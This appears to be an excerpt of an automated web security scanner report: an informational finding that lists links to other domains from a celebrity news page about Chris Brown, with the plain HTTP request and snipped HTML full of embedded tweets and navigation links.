<link rel="stylesheet" media="only screen and (min-device-width: 481px) and (max-device-width: 1024px)" href="http://static.wonderwall.com/cache/css/1285028347/aXBhZC5jc3M..css" />
</head>
...[SNIP]...
<span><img src="http://static.wonderwall.com/photos/Original/41220_Original.jpg" class="imgSrc-http://static.wonderwall.com/photos/Original/41220_Original.jpg" alt="" /></span>
...[SNIP]...
<span><img src="http://static.wonderwall.com/cache/img/clear1x1_1283311127.gif" class="imgSrc-http://static.wonderwall.com/photos/Original/38333_Original.jpg" alt="" /></span>
...[SNIP]...
<span><img src="http://static.wonderwall.com/cache/img/clear1x1_1283311127.gif" class="imgSrc-http://static.wonderwall.com/photos/Original/40989_Original.jpg" alt="" /></span>
...[SNIP]...
<span><img src="http://static.wonderwall.com/cache/img/clear1x1_1283311127.gif" class="imgSrc-http://static.wonderwall.com/photos/Original/28533_Original.jpg" alt="" /></span>
...[SNIP]...
<span><img src="http://static.wonderwall.com/cache/img/clear1x1_1283311127.gif" class="imgSrc-http://static.wonderwall.com/photos/Original/23689_Original.jpg" alt="" /></span>
...[SNIP]...
<span><img src="http://static.wonderwall.com/cache/img/clear1x1_1283311127.gif" class="imgSrc-http://static.wonderwall.com/photos/Original/43555_Original.jpg" alt="/" /></span>
...[SNIP]...
<li class="shareItem shareItem-twitter"><a href="http://twitter.com/share?original_referer=http%3A%2F%2Fwonderwall.redacted%2Fmusic%2Fchris-brown-completes-domestic-violence-program-1594072.story%3Focid%3Dtwtr-utweet" class="twitterProxy"></a>
...[SNIP]...
<li class="shareItem shareItem-windowsLive first"><a href="https://favorites.live.com/quickadd.aspx?url=http%3A%2F%2Fwonderwall.redacted%2Fmusic%2Fchris-brown-completes-domestic-violence-program-1594072.story" target="_blank">Windows Live</a>
...[SNIP]...
<li class="shareItem shareItem-delicious"><a href="http://del.icio.us/post?title=Chris+Brown+completes+domestic+violence+program&url=http%3A%2F%2Fwonderwall.redacted%2Fmusic%2Fchris-brown-completes-domestic-violence-program-1594072.story" target="_blank">Delicious</a></li><li class="shareItem shareItem-myspace"><a href="http://www.myspace.com/Modules/PostTo/Pages/?l=3t=Chris+Brown+completes+domestic+violence+program&u=http%3A%2F%2Fwonderwall.msn.com%2Fmusic%2Fchris-brown-completes-domestic-violence-program-1594072.story" target="_blank">MySpace</a></li><li class="shareItem shareItem-digg"><a href="http://digg.com/submit?phase=2title=Chris+Brown+completes+domestic+violence+program&url=http%3A%2F%2Fwonderwall.redacted%2Fmusic%2Fchris-brown-completes-domestic-violence-program-1594072.story" target="_blank">Digg</a></li><li class="shareItem shareItem-mixx"><a href="http://www.mixx.com/submit?page_url=http%3A%2F%2Fwonderwall.redacted%2Fmusic%2Fchris-brown-completes-domestic-violence-program-1594072.story" target="_blank">Mixx</a></li><li class="shareItem shareItem-reddit last"><a href="http://reddit.com/submit?title=Chris+Brown+completes+domestic+violence+program&url=http%3A%2F%2Fwonderwall.redacted%2Fmusic%2Fchris-brown-completes-domestic-violence-program-1594072.story" target="_blank">Reddit</a>
...[SNIP]...
<cite><a href="http://www.associatedpress.com/">The Associated Press</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/15894_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/michaelianblack">michaelianblack</a>: <a href="http://twitter.com/BrianLynch">@BrianLynch</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/michaelianblack/statuses/31490865776037888">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/41323_Module1x1_634261162153428902.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/emmyrossum">emmyrossum</a>: Day off today, <a href="http://twitter.com/emmarosekenney">@emmarosekenney</a> and I hit up <a href="http://twitter.com/dovetailchicago">@dovetailchicago</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/emmyrossum/statuses/31490256649850880">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/15894_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/michaelianblack">michaelianblack</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/michaelianblack/statuses/31488824462811136">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/27217_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/rihanna">rihanna</a>: <a href="http://twitter.com/__shelovesB">@__shelovesB</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/rihanna/statuses/31485881311297536">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/15298_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/csiriano">csiriano</a>: Important! Various ticket websites are selling fake tickets to my fashion show. I wish everyone who wanted to (cont) <a href="http://tl.gd/8fkbn3">http://tl.gd/8fkbn3</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/csiriano/statuses/31485259056943104">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/27217_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/rihanna">rihanna</a>: #puppyNAVY ? RT <a href="http://twitter.com/RicardoFenty">@RicardoFenty</a>: #DogNavy <a href="http://twitpic.com/3kde2c">http://twitpic.com/3kde2c</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/rihanna/statuses/31484086254051328">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/27217_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/rihanna">rihanna</a>: <a href="http://twitter.com/StevenGParry">@StevenGParry</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/rihanna/statuses/31482886624378880">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/9389_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/PerezHilton">PerezHilton</a>: <a href="http://twitter.com/PaulaAbdul">@PaulaAbdul</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/PerezHilton/statuses/31481637023784960">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/8376_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/BowWow">BowWow</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/BowWow/statuses/31481112115019776">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/25615_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/DJPaulyD">DJPaulyD</a>: RT <a href="http://twitter.com/izzy_kardashian">@izzy_kardashian</a>: "I beat that beat up, call it self defense" you know you've made it when Lil Wayne quotes you in a song - <a href="http://twitter.com/DJPaulyD">@DJPaulyD</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/DJPaulyD/statuses/31480933047603200">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/7503_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/AubreyODay">AubreyODay</a>: LOVE emotional tweets, awe xoxo! "<a href="http://twitter.com/2RQ">@2RQ</a>: <a href="http://twitter.com/AubreyODay">@AubreyODay</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/AubreyODay/statuses/31478843529232385">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/1226_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/llcoolj">llcoolj</a>: <a href="http://twitter.com/ashleeRocs">@ashleeRocs</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/llcoolj/statuses/31477242445959168">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/7503_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/AubreyODay">AubreyODay</a>: Me shooting with the great <a href="http://twitter.com/avoyermagyan">@avoyermagyan</a> <a href="http://twitter.com/traverrains">@traverrains</a> <a href="http://twitter.com/kurumiuchino">@kurumiuchino</a>! <a href="http://twitpic.com/3umrxp">http://twitpic.com/3umrxp</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/AubreyODay/statuses/31475592251580417">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/7877_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/rainnwilson">rainnwilson</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/rainnwilson/statuses/31475437494345729">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/15124_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/LoBosworth">LoBosworth</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/LoBosworth/statuses/31474891412738048">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/7475_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/samantharonson">samantharonson</a>: <a href="http://twitter.com/racheljosephf">@racheljosephf</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/samantharonson/statuses/31474364587180033">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/7475_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/samantharonson">samantharonson</a>: <a href="http://twitter.com/barbara230">@barbara230</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/samantharonson/statuses/31474068645478400">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/7475_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/samantharonson">samantharonson</a>: RT <a href="http://twitter.com/AIDSPolicyProj">@AIDSPolicyProj</a>: <a href="http://twitter.com/samantharonson">@samantharonson</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/samantharonson/statuses/31473906485297152">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/7475_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/samantharonson">samantharonson</a>: RT <a href="http://twitter.com/AIDSPolicyProj">@AIDSPolicyProj</a>: <a href="http://twitter.com/samantharonson">@samantharonson</a> Egyptian activists are cobbling together their own internet: <a href="http://bit.ly/e3toNb">http://bit.ly/e3toNb</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/samantharonson/statuses/31473844573179904">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/15856_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/mccordalex">mccordalex</a>: <a href="http://twitter.com/Punch800">@Punch800</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/mccordalex/statuses/31471195719208960">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/7477_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/iamdiddy">iamdiddy</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/iamdiddy/statuses/31469852891807744">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/7895_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/SarahKSilverman">SarahKSilverman</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/SarahKSilverman/statuses/31469730384580608">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/18487_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/MirandaBuzz">MirandaBuzz</a>: A picture of towel art in the hotel. The elephant in the room. ;) <a href="http://yfrog.com/hsi3mlfj">http://yfrog.com/hsi3mlfj</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/MirandaBuzz/statuses/31469606199623680">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/32972_Module1x1_634164434770437095.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/KimKardashian">KimKardashian</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/KimKardashian/statuses/31468574493114368">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/32972_Module1x1_634164434770437095.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/KimKardashian">KimKardashian</a>: Hate when that happens! Lol RT <a href="http://twitter.com/CarlaDiBello">@CarlaDiBello</a> RT <a href="http://twitter.com/PeterGriffinn">@PeterGriffinn</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/KimKardashian/statuses/31468288559030272">Twitter</a>
...[SNIP]...
<li><a href="http://www.delish.com/recipes/cooking-recipes/tailgating-football-recipes?ocid=xnetr1-3">Tailgating time: 10 winning recipes</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/watch/video/celebrity-gridiron-fans/ufd8pil8?q=Football+Fan&rel=msn&from=en-us_msnhp&form=MSNXNM&ocid=xnetr1-5">Bing video: Celebrity gridiron fans</a>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com" >BLTWY</a>
...[SNIP]...
<li class="hasMenu" id="hasMenu2"><a href="http://msn.foxsports.com/" class="hasMenuLink">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb" >MLB</a></li><li><a href="http://msn.foxsports.com/nascar " >NASCAR</a></li><li><a href="http://msn.foxsports.com/nba" >NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball" >NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb" >NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl" >NFL</a></li><li><a href="http://msn.foxsports.com/nhl" >NHL</a></li><li><a href="http://msn.foxsports.com/fantasy" >Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer" >Soccer</a></li><li class="last"><a href="http://msn.foxsports.com/video?from=en-us_msnhp" >Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home" >Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/" > Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV " > Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV" >Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp" >Video</a>
...[SNIP]...
<li class="last"><a href="http://insidemsn.wordpress.com" >Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/" >White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/" >Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2" >Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" target="_blank">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV " >Travel</a>
...[SNIP]...
<li class="bingLink last"><a href="http://www.bing.com/search?FORM=CWWWBQ" >Bing</a>
...[SNIP]...
<li><a href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170" target="_blank" class="pass">MSN Privacy</a>
...[SNIP]...
<li class="last"><a href="http://onlinehelp.microsoft.com/en-us/msn/Entertainment.aspx" onclick="window.open(this.href,'help','width=960,height=720,resizeable=yes,status=no,titlebar=no,toolbar=no'); return false;" class="ignore" target="blank">Help</a>
...[SNIP]...
</p><a href="http://microsoft.com" >Microsoft</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...

22.363. http://wonderwall.redacted/music/chris-brown-completes-domestic-violence-program-1594072.story

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wonderwall.redacted
Path:   /music/chris-brown-completes-domestic-violence-program-1594072.story

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /music/chris-brown-completes-domestic-violence-program-1594072.story?GT1=28135 HTTP/1.1
Host: wonderwall.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sun, 30 Jan 2011 16:56:54 GMT
Expires:
Pragma:
Cache-Control: public
Cache-Control: max-age=300
Vary: Accept-Encoding
Content-Type: text/html
Age: 145
X-Cache-Lookup: HIT from localhost:8080
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!--[if lt IE 7]> <html class="ie ie6 lte9 lte8 lte7" xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
<meta name="Search.Image" content="http://static.wonderwall.com/photos/Module1x1/41220_Module1x1.jpg" />
<link rel="image_src" href="http://static.wonderwall.com/photos/Module1x1/41220_Module1x1.jpg" />

<meta property="fb:app_id" content="111376106992" />
<script type="text/javascript" src="http://amch.questionmarket.com/adsc/d840549/13/842134/randm.js"></script>
...[SNIP]...
</script>
<script src="http://yui.yahooapis.com/3.2.0/build/yui/yui-min.js" type="text/javascript"></script>
...[SNIP]...
</script>

<link rel="stylesheet" type="text/css" href="http://static.wonderwall.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.css" />
<link rel="stylesheet" type="text/css" href="http://static.wonderwall.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.css" />
<link rel="stylesheet" media="only screen and (max-device-width: 480px)" href="http://static.wonderwall.com/cache/css/1285028347/aXBhZC5jc3M..css" />
<link rel="stylesheet" media="only screen and (min-device-width: 481px) and (max-device-width: 1024px)" href="http://static.wonderwall.com/cache/css/1285028347/aXBhZC5jc3M..css" />
</head>
...[SNIP]...
<span><img src="http://static.wonderwall.com/photos/Original/41220_Original.jpg" class="imgSrc-http://static.wonderwall.com/photos/Original/41220_Original.jpg" alt="" /></span>
...[SNIP]...
<span><img src="http://static.wonderwall.com/cache/img/clear1x1_1283311127.gif" class="imgSrc-http://static.wonderwall.com/photos/Original/38333_Original.jpg" alt="" /></span>
...[SNIP]...
<span><img src="http://static.wonderwall.com/cache/img/clear1x1_1283311127.gif" class="imgSrc-http://static.wonderwall.com/photos/Original/40989_Original.jpg" alt="" /></span>
...[SNIP]...
<span><img src="http://static.wonderwall.com/cache/img/clear1x1_1283311127.gif" class="imgSrc-http://static.wonderwall.com/photos/Original/28533_Original.jpg" alt="" /></span>
...[SNIP]...
<span><img src="http://static.wonderwall.com/cache/img/clear1x1_1283311127.gif" class="imgSrc-http://static.wonderwall.com/photos/Original/23689_Original.jpg" alt="" /></span>
...[SNIP]...
<span><img src="http://static.wonderwall.com/cache/img/clear1x1_1283311127.gif" class="imgSrc-http://static.wonderwall.com/photos/Original/43555_Original.jpg" alt="/" /></span>
...[SNIP]...
<li class="shareItem shareItem-twitter"><a href="http://twitter.com/share?original_referer=http%3A%2F%2Fwonderwall.redacted%2Fmusic%2Fchris-brown-completes-domestic-violence-program-1594072.story%3Focid%3Dtwtr-utweet" class="twitterProxy"></a>
...[SNIP]...
<li class="shareItem shareItem-windowsLive first"><a href="https://favorites.live.com/quickadd.aspx?url=http%3A%2F%2Fwonderwall.redacted%2Fmusic%2Fchris-brown-completes-domestic-violence-program-1594072.story" target="_blank">Windows Live</a>
...[SNIP]...
<li class="shareItem shareItem-delicious"><a href="http://del.icio.us/post?title=Chris+Brown+completes+domestic+violence+program&url=http%3A%2F%2Fwonderwall.redacted%2Fmusic%2Fchris-brown-completes-domestic-violence-program-1594072.story" target="_blank">Delicious</a></li><li class="shareItem shareItem-myspace"><a href="http://www.myspace.com/Modules/PostTo/Pages/?l=3t=Chris+Brown+completes+domestic+violence+program&u=http%3A%2F%2Fwonderwall.msn.com%2Fmusic%2Fchris-brown-completes-domestic-violence-program-1594072.story" target="_blank">MySpace</a></li><li class="shareItem shareItem-digg"><a href="http://digg.com/submit?phase=2title=Chris+Brown+completes+domestic+violence+program&url=http%3A%2F%2Fwonderwall.redacted%2Fmusic%2Fchris-brown-completes-domestic-violence-program-1594072.story" target="_blank">Digg</a></li><li class="shareItem shareItem-mixx"><a href="http://www.mixx.com/submit?page_url=http%3A%2F%2Fwonderwall.redacted%2Fmusic%2Fchris-brown-completes-domestic-violence-program-1594072.story" target="_blank">Mixx</a></li><li class="shareItem shareItem-reddit last"><a href="http://reddit.com/submit?title=Chris+Brown+completes+domestic+violence+program&url=http%3A%2F%2Fwonderwall.redacted%2Fmusic%2Fchris-brown-completes-domestic-violence-program-1594072.story" target="_blank">Reddit</a>
...[SNIP]...
<cite><a href="http://www.associatedpress.com/">The Associated Press</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/24074_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/NickCannon">NickCannon</a>: <a href="http://twitter.com/TheBatkave">@TheBatkave</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/NickCannon/statuses/31746607615574016">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/4422_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/alydenisof">alydenisof</a>: <a href="http://twitter.com/wendyhagen">@wendyhagen</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/alydenisof/statuses/31744920150614016">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/4145_Module1x1_634273984962298019.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/yokoono">yokoono</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/yokoono/statuses/31743517785071616">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/23114_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Sn00ki">Sn00ki</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Sn00ki/statuses/31737381589614592">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: RT <a href="http://twitter.com/BravoAndy"><a href="http://twitter.com/BravoAndy">@BravoAndy</a></a>: Brand new live at 11:30 after ATL finale with <a href="http://twitter.com/kimzolciak">@kimzolciak</a> and her man Kroy! RT:<a href="http://twitter.com/mikelizonn">@mikelizonn</a>: <a href="http://twitter.com/BravoAndy"><a href="http://twitter.com/BravoAndy">@BravoAndy</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/31734736913170432">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: <a href="http://twitter.com/MsBrandi17">@MsBrandi17</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/31729553827172352">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: RT <a href="http://twitter.com/BrandonnStRegis">@BrandonnStRegis</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/31729214356979713">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/25615_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/DJPaulyD">DJPaulyD</a>: RT <a href="http://twitter.com/Akeel93">@Akeel93</a>: "<a href="http://twitter.com/DJPaulyD">@DJPaulyD</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/DJPaulyD/statuses/31727445837090816">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: :) RT <a href="http://twitter.com/BrandonnStRegis">@BrandonnStRegis</a> EVERY1 tune in2 the 90 minute long SEASON FINALE of RHOA 10pm on Bravo & <a href="http://twitter.com/kimzolciak">@kimzolciak</a> & <a href="http://twitter.com/biermann71">@biermann71</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/31726145497989121">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/30371_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Bethenny">Bethenny</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Bethenny/statuses/31719343947522049">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: Yes! Lol RT <a href="http://twitter.com/AshNHartz">@AshNHartz</a>: <a href="http://twitter.com/Kimzolciak">@Kimzolciak</a> Are you & <a href="http://twitter.com/biermann71">@biermann71</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/31716672863731714">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: I was 3 months in this pic RT <a href="http://twitter.com/Please_Stand_By">@Please_Stand_By</a>: <a href="http://twitter.com/Kimzolciak">@Kimzolciak</a> This is you recently pregnant? <a href="http://twitpic.com/3uqhh4">http://twitpic.com/3uqhh4</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/31716118221561856">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/8376_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/BowWow">BowWow</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/BowWow/statuses/31716032452231168">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/31712954776821760">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: Yes! Opening for a Huge mega star! I'm beyond excited! RT <a href="http://twitter.com/iutrav">@iutrav</a>: <a href="http://twitter.com/Kimzolciak">@Kimzolciak</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/31712647732797440">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: Ur a doll! RT <a href="http://twitter.com/JoshGottlieb">@JoshGottlieb</a>: Fun day! Thank you <a href="http://twitter.com/BrielleZolciak">@BrielleZolciak</a>, <a href="http://twitter.com/arianazolciak">@arianazolciak</a> <a href="http://twitter.com/biermann71">@biermann71</a> and <a href="http://twitter.com/Kimzolciak">@Kimzolciak</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/31712300427644928">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: RT <a href="http://twitter.com/AtlantaPlaces">@AtlantaPlaces</a>: Club Life is buzzing again: <a href="http://sch.mp/0jHde">http://sch.mp/0jHde</a> - RT <a href="http://twitter.com/KingLj11">@KingLj11</a> Me and <a href="http://twitter.com/Kimzolciak">@Kimzolciak</a> @ club Life!! <a href="http://twitpic.com/3uqhh4">http://twitpic.com/3uqhh4</a>
...[SNIP]...
